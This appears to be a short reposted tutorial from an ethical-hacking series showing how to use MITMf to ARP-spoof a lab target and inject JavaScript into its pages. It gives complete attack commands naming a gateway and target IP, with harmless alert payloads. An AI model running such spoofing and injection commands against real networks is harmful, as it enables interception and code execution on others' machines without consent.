首页 > Web开发 > 详细

Ethical Hacking - NETWORK PENETRATION TESTING(21)

时间:2019-12-15 16:19:58      阅读:86      评论:0      收藏:0      [点我收藏+]

MITM - Code Injection

  • Inject javascript or HTML code into pages.
  • Code gets executed on target machine.
  • Use - - inject plugin.

Code can be:

1. Stored on a local file --js-file or --html-file

2. Stored online --js-url or --html-url

3. Or you can supply the code through the terminal --js-payload or --html-payload

 

Usage Case 1:

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --targets 10.0.0.22 --inject --js-payload "alter(‘test‘);"

技术分享图片

 

The inection code works.

技术分享图片

 

 

Usage case2:

Edit the js file and save it as alert.js in the root folder.

alert(‘test‘);

Run the commands on the terminal.

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --target 10.0.0.22 --inject --js-file /root/alert.js

技术分享图片

 

 The injection file works...

技术分享图片

 

Ethical Hacking - NETWORK PENETRATION TESTING(21)

原文:https://www.cnblogs.com/keepmoving1113/p/12044150.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!